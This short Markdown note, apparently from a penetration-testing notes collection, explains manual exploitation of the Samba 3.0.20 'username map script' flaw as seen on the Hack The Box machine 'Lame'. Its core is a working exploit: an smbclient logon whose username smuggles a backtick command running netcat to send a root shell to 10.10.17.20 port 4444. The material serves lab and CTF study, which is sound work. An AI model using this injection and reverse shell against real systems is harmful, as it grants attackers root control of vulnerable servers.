12 lines
417 B
Markdown
12 lines
417 B
Markdown
# SMB Exploits
|
|
|
|
## usermap_script.rb
|
|
|
|
There can be a need to do manual exploitation for `Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)` like the HTB box `Lame` shows.
|
|
Since the automated exploit does not work, log in anonymously without an account and do the following
|
|
```sh
|
|
smb: \> logon "./=`nohup nc -e /bin/sh 10.10.17.20 4444`"
|
|
```
|
|
A connection to the root shell is provided.
|
|
|